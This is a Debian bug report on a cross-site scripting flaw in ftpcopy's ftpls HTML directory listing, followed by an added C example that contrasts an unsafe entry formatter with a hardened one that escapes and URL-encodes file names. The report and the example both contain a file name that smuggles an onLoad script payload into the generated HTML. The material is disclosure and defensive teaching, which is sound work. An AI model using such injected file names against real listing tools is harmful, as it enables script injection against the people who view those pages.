Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing
Package: ftpcopy
Version: 0.6.7-2
Severity: important
Tags: security

The ftpls command has a cross-site scripting (XSS) security bug when
generating HTML listings:

$ ls -al /srv/ftp
total 12
drwxr-xr-x 2 root ftp  4096 Dec 19 02:40 .
drwxr-xr-x 3 root root 4096 Dec 19 02:34 ..
-rw-r--r-- 1 root root    0 Dec 19 02:39 "><body onLoad="alert('non-customers crew');">
-rw-r--r-- 1 root root   39 Dec 19 02:40 number2
$ ftpls -h ftp://localhost/
<html><head>
</head><body>
<dl>
<dt><a href="ftp://localhost/"><body onLoad="alert('non-customers crew');">">"><body onLoad="alert('non-customers crew');"></a><br>
<dd> last modified 2010-12-19 02:39:00,    0    B
<dt><a href="ftp://localhost/number2">number2</a><br>
<dd> last modified 2010-12-19 02:40:00,   39    B
</dl></body></html>
$

-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages ftpcopy depends on:
ii  libc6                         2.11.2-7   Embedded GNU C Library: Shared lib

ftpcopy recommends no packages.

ftpcopy suggests no packages.

-- no debconf information

-- 
non-customers crew | http://rock-madrid.com/
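An added example, not ftpcopy's code, showing the defect the listing above demonstrates next to a hardened version: the file name is interpolated verbatim into both the href attribute and the link text, so a name containing `"` and `>` closes the anchor and injects its own markup. The safe variant treats the two contexts separately, percent-encoding the name as a URL path segment for the href (it also encodes `/`, which goes beyond the reported case) and HTML-escaping it for the element text. The function names, the `ftp://localhost/` base prefix and the assumption that the prefix itself is already safe are all choices made for this example.

```c
/* Added example (not from ftpcopy): an unsafe and a safe way to emit one
   <dt> entry of an HTML directory listing. Function names are made up here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* HTML-escape `in` for use as element text or inside a double-quoted
   attribute value. Returns a malloc'd string; the caller frees it. */
char *html_escape(const char *in)
{
    size_t cap = strlen(in) * 6 + 1;      /* worst case: every byte -> "&quot;" */
    char *out = malloc(cap);
    if (!out) return NULL;
    char *p = out;
    for (; *in; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep) { size_t n = strlen(rep); memcpy(p, rep, n); p += n; }
        else *p++ = *in;
    }
    *p = '\0';
    return out;
}

/* Percent-encode one path segment for a URL: keep the RFC 3986 unreserved
   set (ALPHA / DIGIT / "-" / "." / "_" / "~") and encode every other byte,
   including '/', so a name cannot change the directory part of the URL. */
char *url_encode_segment(const char *in)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t cap = strlen(in) * 3 + 1;      /* worst case: every byte -> "%XX" */
    char *out = malloc(cap);
    if (!out) return NULL;
    char *p = out;
    for (; *in; in++) {
        unsigned char c = (unsigned char)*in;
        int unreserved = (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
                         (c >= 'a' && c <= 'z') || c == '-' || c == '.' ||
                         c == '_' || c == '~';
        if (unreserved) {
            *p++ = (char)c;
        } else {
            *p++ = '%'; *p++ = hex[c >> 4]; *p++ = hex[c & 0x0F];
        }
    }
    *p = '\0';
    return out;
}

/* The shape the report demonstrates: the raw name lands in both the href
   and the link text. Kept here only for contrast. */
char *format_entry_unsafe(const char *base, const char *name)
{
    const char *fmt = "<dt><a href=\"%s%s\">%s</a><br>";
    int n = snprintf(NULL, 0, fmt, base, name, name);
    if (n < 0) return NULL;
    char *out = malloc((size_t)n + 1);
    if (out) snprintf(out, (size_t)n + 1, fmt, base, name, name);
    return out;
}

/* Hardened version: `base` is assumed to be a trusted URL prefix ending in
   '/'; the name is URL-encoded for the href and HTML-escaped for the text. */
char *format_entry(const char *base, const char *name)
{
    char *href = url_encode_segment(name);
    char *text = html_escape(name);
    char *out = NULL;
    if (href && text) {
        const char *fmt = "<dt><a href=\"%s%s\">%s</a><br>";
        int n = snprintf(NULL, 0, fmt, base, href, text);
        if (n >= 0 && (out = malloc((size_t)n + 1)) != NULL)
            snprintf(out, (size_t)n + 1, fmt, base, href, text);
    }
    free(href);
    free(text);
    return out;
}

int main(void)
{
    /* Constructed input: the file name used in the report. */
    const char *name = "\"><body onLoad=\"alert('non-customers crew');\">";
    char *bad = format_entry_unsafe("ftp://localhost/", name);
    char *good = format_entry("ftp://localhost/", name);
    printf("unsafe: %s\nsafe:   %s\n", bad ? bad : "(oom)", good ? good : "(oom)");
    free(bad);
    free(good);
    return 0;
}
```

The point to take from the two functions is that the href and the link text are different output contexts: percent-encoding alone would not protect the text, and HTML-escaping alone would leave `&quot;` and `&gt;` inside a URL, so each context gets its own encoder.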